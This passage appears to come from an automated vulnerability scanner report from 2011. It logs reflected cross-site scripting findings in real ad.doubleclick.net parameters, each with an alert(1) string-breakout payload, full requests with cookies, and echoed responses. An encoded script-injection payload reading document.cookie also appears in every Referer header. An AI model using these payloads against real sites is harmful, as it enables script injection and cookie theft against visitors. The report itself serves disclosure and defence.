tp://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/t%3B233938245%3B0-0%3B0%3B50024984%3B3454-728/90%3B39890603/39908390/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=6068503311614710962064"-alert(1)-"db102385c04&mt_id=103149&mt_adid=76&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http%3a%2f%2fwww.lloydstsb-offshore.com/international-current-accounts/%3FWT.mc_id%3DPIA_MM_DR");
var fscUrl = url;
var
...[SNIP]...

3.27. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e376e'-alert(1)-'bf4060873d4 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84e376e'-alert(1)-'bf4060873d4&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=71564039248027041? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5885

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
lick%3Bh%3Dv8/3aa7/f/a6/%2a/r%3B228033667%3B0-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84e376e'-alert(1)-'bf4060873d4&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1\">
...[SNIP]...

3.28. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f221"-alert(1)-"1a47e7ddd0c was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=841f221"-alert(1)-"1a47e7ddd0c&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=71564039248027041? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5885

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
lick%3Bh%3Dv8/3aa7/f/a6/%2a/r%3B228033667%3B0-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=841f221"-alert(1)-"1a47e7ddd0c&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
...[SNIP]...

3.29. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3696"-alert(1)-"456ec64c8fc was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657f3696"-alert(1)-"456ec64c8fc&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=71564039248027041? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5885

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/r%3B228033667%3B0-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657f3696"-alert(1)-"456ec64c8fc&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
v
...[SNIP]...

3.30. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18d99'-alert(1)-'38e55555851 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=10065718d99'-alert(1)-'38e55555851&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=71564039248027041? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5885

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/r%3B228033667%3B0-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=10065718d99'-alert(1)-'38e55555851&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1\">
...[SNIP]...

3.31. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8808b'-alert(1)-'f04a9d4c145 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a95612958808b'-alert(1)-'f04a9d4c145&redirect=;ord=71564039248027041? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5885

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a95612958808b'-alert(1)-'f04a9d4c145&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1\">
...[SNIP]...

3.32. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [mt_uuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f01bd"-alert(1)-"fee235b1bf2 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295f01bd"-alert(1)-"fee235b1bf2&redirect=;ord=71564039248027041? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5885

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295f01bd"-alert(1)-"fee235b1bf2&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var o
...[SNIP]...

3.33. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6caa1"-alert(1)-"7a04f899c71 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=6caa1"-alert(1)-"7a04f899c71 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5855
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:28:52 GMT
Expires: Mon, 07 Feb 2011 02:28:52 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
1919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=6caa1"-alert(1)-"7a04f899c71https://www.maxclarity.com/tv/?uid=BN1_PSD1");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
...[SNIP]...

3.34. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb0bf'-alert(1)-'66f3aad0857 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=bb0bf'-alert(1)-'66f3aad0857 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5855
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 07 Feb 2011 02:28:56 GMT
Expires: Mon, 07 Feb 2011 02:28:56 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
1919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=bb0bf'-alert(1)-'66f3aad0857https://www.maxclarity.com/tv/?uid=BN1_PSD1\">
...[SNIP]...

3.35. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90fb0"-alert(1)-"59611f3a704 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=7156403924802704190fb0"-alert(1)-"59611f3a704&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=71564039248027041? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5885

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
p://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/r%3B228033667%3B0-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=7156403924802704190fb0"-alert(1)-"59611f3a704&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode =
...[SNIP]...

3.36. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.4 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6275.282079.EURORSCGEDGE/B4767814.4

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc9d4'-alert(1)-'8d9112ba486 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N6275.282079.EURORSCGEDGE/B4767814.4;sz=160x600;click=http://pixel.mathtag.com/click/img?mt_aid=71564039248027041cc9d4'-alert(1)-'8d9112ba486&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=;ord=71564039248027041? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/185/thechive_sites/160x600/thechive_us?t=1297045701817&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fthechive.com%2F%3F45f7b%2522%253E%253Cscript%253Ealert(%2564%256F%2563%2575%256D%2565%256E%2574%252E%2563%256F%256F%256B%2569%2565)%253C%2Fscript%253Ed3d5acd1ad9%3D1&refer=http%3A%2F%2Fburp%2Fshow%2F25
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 07 Feb 2011 02:28:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5885

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Sun Oct 10 23:15:24 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
p://ad.doubleclick.net/click%3Bh%3Dv8/3aa7/f/a6/%2a/r%3B228033667%3B0-0%3B0%3B51919807%3B2321-160/600%3B38814481/38832238/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=71564039248027041cc9d4'-alert(1)-'8d9112ba486&mt_id=100657&mt_adid=84&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=https%3a%2f%2fwww.maxclarity.com/tv/%3Fuid%3DBN1_PSD1\">
...[SNIP]...

3.37. http://ad.doubleclick.net/adj/N6275.282079.EURORSCGEDGE/B4767814.55 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
